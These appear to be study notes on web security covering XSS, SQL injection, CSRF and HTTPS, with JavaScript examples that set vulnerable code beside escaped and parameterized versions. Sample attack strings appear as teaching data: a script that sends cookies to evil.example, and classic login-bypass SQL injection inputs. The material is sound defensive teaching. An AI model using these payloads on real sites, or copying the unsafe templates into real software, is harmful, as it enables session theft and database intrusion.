Web Security
- Assume the worst case *
- Exposed to threats
- Data theft / destruction
- System attacks
- vulnerabilities
- defensive: use automated alerts (monitoring) so that an attack is noticed, not just prevented
Attack Types
- Malicious code execution
- Cryptographic attacks: breaking or bypassing the cryptography that is supposed to keep secrets hidden
- Data interception
- Denial of Service
owasp.org/www-project-top-ten/
OWASP Top Ten Web Application Security Risks | OWASP
The OWASP Top 10 is the reference standard for the most critical web application security risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing your software development culture focused on producing secure code.
XSS
- Cross-Site Scripting: attacker-controlled script ends up in a page served by a trusted site and runs in other users' browsers with that site's origin (cookies, DOM, session)
- A type of injection: input that should have been shown as text (HTML entities) is interpreted as HTML / JavaScript instead
- Malicious scripts are injected into web sites
- scripts could be entered on any input: form fields, URL parameters, headers, or stored data that is displayed later
XSS Solutions
- Escape / sanitize all user input
- Escape output before it is placed in a sensitive context (HTML body, attribute, JavaScript, URL); each context needs its own encoding
- XSS Prevention Cheat Sheet (OWASP)
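Added example (not from the notes): output escaping in Node.js, with the vulnerable template next to the hardened one. The comment payload, the `renderComment*` / `renderLinkSafe` function names and the `evil.example` host are made up for the illustration.

```javascript
// Escape the five characters that can break out of an HTML text node or a
// double-quoted attribute. This is what "escape before putting it on the page" means.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: user input is concatenated straight into the markup.
function renderCommentUnsafe(comment) {
  return `<p class="comment">${comment}</p>`;
}

// Hardened: same template, but the untrusted value is escaped for the HTML body context.
function renderCommentSafe(comment) {
  return `<p class="comment">${escapeHtml(comment)}</p>`;
}

// Attribute + URL context: quote the attribute, escape the value, AND restrict the
// scheme. A javascript: URL would still run code even if every character were escaped.
function renderLinkSafe(title, href) {
  const safeHref = /^https?:\/\//i.test(href) ? href : '#';
  return `<a href="${escapeHtml(safeHref)}">${escapeHtml(title)}</a>`;
}

// Crude check a tester would run on the rendered output: did a real <script> tag survive?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Constructed sample payload, typical of what gets typed into any input field.
const PAYLOAD = '<script>document.location="https://evil.example/?c="+document.cookie</script>';

console.log(renderCommentUnsafe(PAYLOAD)); // script tag survives: XSS
console.log(renderCommentSafe(PAYLOAD));   // shown to the user as harmless text
console.log(renderLinkSafe('home', 'javascript:alert(1)'));
```

Escaping is context-specific: the table above is correct for HTML text and quoted attributes, but a value dropped into a `<script>` block or a CSS property needs a different encoder, which is why the cheat sheet lists one rule per context.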
SQL Injection
- just use an ORM / query builder such as Sequelize, which parameterizes queries for you
- parameterized statements (prepared statements / bind variables): the SQL text is fixed, values are sent separately as data
- escaping user input (fallback only; parameters are preferred)
- privilege control: the application's database account gets least privilege, so an injection cannot drop tables or read other schemas
- SQL Injection Prevention Cheat Sheet (OWASP)
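Added example (not from the notes, and not Sequelize's own code): the injectable concatenation beside the parameterized and the escaped forms, plus a small scanner that shows why injection works: the attacker's input changes the structure of the statement, not just a value. No database is needed; the table and column names (`users`, `name`, `pw`) and the attack strings are constructed for the illustration.

```javascript
// Vulnerable: user input becomes part of the SQL text.
function buildLoginQueryUnsafe(username, password) {
  return `SELECT id FROM users WHERE name = '${username}' AND pw = '${password}'`;
}

// Parameterized: the SQL text never changes; the values travel separately and the
// driver binds them as data. Sequelize's `replacements` / `bind` options work like this.
function buildLoginQuerySafe(username, password) {
  return { text: 'SELECT id FROM users WHERE name = ? AND pw = ?', values: [username, password] };
}

// Escaping (second-best): double every single quote so it cannot close the literal.
function escapeSqlLiteral(value) {
  return `'${String(value).replace(/'/g, "''")}'`;
}
function buildLoginQueryEscaped(username, password) {
  return `SELECT id FROM users WHERE name = ${escapeSqlLiteral(username)} AND pw = ${escapeSqlLiteral(password)}`;
}

// Skeleton of a statement: every single-quoted literal (with '' as the escape) is
// replaced by '?', leaving only the SQL the database will actually interpret.
function sqlSkeleton(sql) {
  let out = '';
  let i = 0;
  while (i < sql.length) {
    if (sql[i] !== "'") { out += sql[i++]; continue; }
    i++; // opening quote
    while (i < sql.length) {
      if (sql[i] === "'" && sql[i + 1] === "'") { i += 2; continue; } // escaped quote, stay inside
      if (sql[i] === "'") break;                                      // closing quote
      i++;
    }
    i++; // step past the closing quote (or past the end if unterminated)
    out += '?';
  }
  return out;
}

// What the developer intended the statement to look like.
const EXPECTED_SKELETON = sqlSkeleton(buildLoginQueryUnsafe('alice', 'secret'));

// True when the input only filled in values and did not alter the SQL itself.
function structureIntact(sql) {
  return sqlSkeleton(sql) === EXPECTED_SKELETON;
}

// Constructed attacker inputs.
const COMMENT_ATTACK = "admin' --";      // closes the literal, comments out the password check
const TAUTOLOGY_ATTACK = "' OR '1'='1";  // classic always-true condition

console.log(sqlSkeleton(buildLoginQueryUnsafe(COMMENT_ATTACK, 'x')));   // skeleton changed
console.log(sqlSkeleton(buildLoginQueryEscaped(COMMENT_ATTACK, 'x')));  // skeleton intact
console.log(buildLoginQuerySafe(TAUTOLOGY_ATTACK, 'x'));                // text fixed, value separate
```

The scanner only understands single-quoted string literals, which is exactly the case quote-doubling handles; it says nothing about numeric contexts, `LIKE` wildcards, or charset tricks that have defeated escaping in real drivers. That gap is why parameterized statements come first on the cheat sheet and escaping is the fallback.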
CSRF
- Cross-Site Request Forgery
- forces a logged-in user's browser to send a request the user did not intend (the browser attaches the session cookie automatically, so the server treats the forged request as authorized)
CSRF Solutions
- Identifying the source origin: check the Origin (or Referer) request header against your own site
- note: Access-Control-Allow-Origin is a CORS *response* header; it does not stop a forged form POST from being sent and processed
- Synchronizer Tokens: a per-session random secret embedded in forms and verified on every state-changing request
HTTPS
- HTTP is plaintext; HTTPS is HTTP over TLS
- only the hostname (the DNS lookup, and the SNI field of the TLS handshake) and the target IP are exposed on the wire
Secured (encrypted) by TLS:
- path
- query string
- payload (body)
- every method (GET as well as POST)
The Handshake
- client and server negotiate the TLS version and cipher suite; the server presents its certificate, the client verifies it against its trusted CAs, and both derive the session keys
Heroku / Let’s Encrypt
- Let's Encrypt gives TLS certificates for free; Heroku can provision them for a deployed app
Bug Bounties
- pay external researchers to test the security and report the vulnerabilities they find